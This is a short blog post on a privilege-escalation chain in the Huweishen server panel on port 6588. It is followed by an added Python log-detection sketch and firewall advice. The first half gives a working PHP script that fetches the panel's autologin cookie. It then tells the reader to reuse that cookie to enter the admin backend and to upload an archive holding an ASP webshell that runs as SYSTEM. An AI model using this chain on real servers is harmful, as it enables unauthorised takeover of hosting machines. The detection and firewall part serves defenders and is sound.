Huweishen (护卫神) Port 6588 Privilege Escalation Vulnerability

Category: 颓废's Blog


Prerequisites:

Shell access

Ability to execute scripts

```php
<?php
function httpGet() {
    $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);          // include the response headers in the output
    curl_setopt($ch, CURLOPT_NOBODY, TRUE);          // skip the response body; only the headers are needed
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);  // return the response as a string
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE); // do not follow redirects
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
echo 'asd'; // marker string
?>
```

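Upload the script and request it to obtain the cookie. After modifying the cookie, a visit to :6588/admin/index.asp successfully enters the admin backend.

Then use the archive-extraction feature the panel supports: the archive contains an ASP webshell, which runs with Huweishen's SYSTEM privileges and thereby achieves privilege escalation.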
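For defenders, the sequence above leaves a recognisable trace in the management site's access log: a scripted request for `?f=autologin` on port 6588, then admin access from a different client. The following detection sketch is an added example, not code from the original post or from Huweishen; it assumes W3C extended logs with a `#Fields:` header, and the log lines, IP addresses and 30-minute window are constructed for illustration.

```python
from datetime import datetime, timedelta

ADMIN_PORT = "6588"
WINDOW = timedelta(minutes=30)  # assumed review window, tune locally

# Constructed W3C extended log lines (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time s-port cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2024-01-10 03:12:01 6588 GET /admin/index.asp f=autologin 127.0.0.1 Mozilla/5.0 302
2024-01-10 09:40:10 6588 HEAD /admin/index.asp f=autologin 192.0.2.10 - 302
2024-01-10 09:41:30 6588 GET /admin/index.asp - 203.0.113.7 Mozilla/5.0 200
2024-01-10 11:00:00 80 GET /index.php - 198.51.100.4 Mozilla/5.0 200
2024-01-10 14:00:00 6588 GET /admin/index.asp - 203.0.113.9 Mozilla/5.0 200
"""

def parse(log_text):
    """Yield one dict per request, using the #Fields: directive for column names."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"],
                                          "%Y-%m-%d %H:%M:%S")
            yield row

def find_suspicious(log_text):
    """Return (kind, time, client_ip) tuples worth an analyst's review."""
    findings, last_scripted = [], None
    for r in parse(log_text):
        if r.get("s-port") != ADMIN_PORT:
            continue
        stem = r.get("cs-uri-stem", "").lower()
        query = r.get("cs-uri-query", "").lower()
        # curl with CURLOPT_NOBODY sends HEAD and, by default, no User-Agent.
        scripted = r.get("cs(User-Agent)", "-") == "-" or r.get("cs-method") == "HEAD"
        if "f=autologin" in query and scripted:
            last_scripted = r
            findings.append(("scripted_autologin", r["time"], r["c-ip"]))
        elif (last_scripted and stem.startswith("/admin/")
              and r["c-ip"] != last_scripted["c-ip"]
              and r["ts"] - last_scripted["ts"] <= WINDOW):
            findings.append(("admin_access_after_autologin", r["time"], r["c-ip"]))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding)
```

Restricting port 6588 to trusted management addresses at the firewall removes the second stage of this pattern regardless of how the cookie was obtained.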
